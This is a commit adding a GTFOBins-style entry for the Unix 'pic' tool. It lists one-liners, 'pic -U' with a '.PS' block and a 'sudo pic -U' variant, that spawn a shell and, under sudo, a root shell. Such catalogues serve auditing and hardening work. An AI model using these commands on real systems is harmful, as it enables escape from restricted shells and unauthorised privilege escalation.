This commit is contained in:
egre55 2018-11-02 22:45:58 +00:00 committed by Andrea Cardaci
parent 3cd9494b9b
commit 0b62b20891

13
_gtfobins/pic.md Normal file
View File

@ -0,0 +1,13 @@
---
functions:
shell:
- code: |
pic -U
.PS
sh X sh X
sudo:
- code: |
sudo pic -U
.PS
sh X sh X
---